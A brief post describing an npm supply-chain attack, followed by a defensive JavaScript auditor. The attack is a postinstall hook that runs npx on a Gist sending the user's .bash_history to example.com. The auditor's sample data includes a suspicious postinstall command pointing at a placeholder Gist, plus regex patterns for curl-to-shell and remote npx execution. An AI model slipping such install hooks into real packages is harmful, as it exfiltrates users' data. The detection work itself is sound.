Using a postinstall npm script, I can invoke npx to a random Gist script that can steal your stuff.
It runs this script: https://gist.github.com/tanepiper/6cb9067adca626cd2c0edbc3786dad7b
which takes a user's .bash_history
and posts it to example.com. This could be much more malicious.
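The install-time pattern described above (a `postinstall` lifecycle hook that shells out to `npx` against a remote Gist) is something a defender can flag before `npm install` ever runs the script. The following is an added example, not code from the original post or from the linked Gist: a small audit helper that parses a `package.json`, looks at the npm lifecycle hooks, and reports commands that execute code fetched from the network. The package names, script bodies and Gist URL in the samples are constructed placeholders, and the regex patterns are my own heuristics, not an npm feature.

```javascript
// Added example (not from the original post or the linked Gist): audit npm
// lifecycle hooks for install-time execution of remote code. Sample data below
// is constructed; the Gist URL is a placeholder, not the one in the post.

// npm lifecycle hooks that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic patterns (author's own) for "fetch something remote and run it".
const REMOTE_EXEC_PATTERNS = [
  { id: "npx-remote-url", re: /\bnpx\b[^&|;]*https?:\/\//i, why: "npx invoked against a remote URL" },
  { id: "npx-gist", re: /\bnpx\b[^&|;]*gist\.github\.com/i, why: "npx invoked against a GitHub Gist" },
  { id: "curl-pipe-shell", re: /\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b/i, why: "download piped into a shell" },
  { id: "node-eval-remote", re: /\bnode\s+-e\b.*(https?:\/\/|fetch\(|http\.get)/i, why: "inline node script pulling remote content" },
];

// Returns one finding per suspicious lifecycle hook: { package, hook, pattern, reason, command }.
function auditLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const p of REMOTE_EXEC_PATTERNS) {
      if (p.re.test(cmd)) {
        findings.push({ package: pkg.name, hook, pattern: p.id, reason: p.why, command: cmd });
        break; // report the first matching pattern for this hook
      }
    }
  }
  return findings;
}

// Constructed sample: the shape the post describes, with a placeholder Gist URL.
const SAMPLE_SUSPICIOUS_PACKAGE_JSON = JSON.stringify({
  name: "example-suspicious-package",
  version: "1.0.0",
  scripts: {
    postinstall: "npx https://gist.github.com/EXAMPLE_USER/EXAMPLE_GIST_ID",
    test: "node test.js",
  },
});

// Constructed sample: a postinstall hook that only runs code shipped in the package itself.
const SAMPLE_CLEAN_PACKAGE_JSON = JSON.stringify({
  name: "example-clean-package",
  version: "1.0.0",
  scripts: { postinstall: "node scripts/build-native.js", test: "node test.js" },
});

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditLifecycleScripts(SAMPLE_SUSPICIOUS_PACKAGE_JSON)) {
    console.log(`[${f.package}] ${f.hook}: ${f.reason}\n    ${f.command}`);
  }
  console.log(`clean package findings: ${auditLifecycleScripts(SAMPLE_CLEAN_PACKAGE_JSON).length}`);
}
```

Point this at the `package.json` files under `node_modules` in CI to see which dependencies run network-fetched code at install time. Independently of any scanner, installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents lifecycle hooks such as the one above from running at all, at the cost of breaking packages that legitimately build native code in `postinstall`.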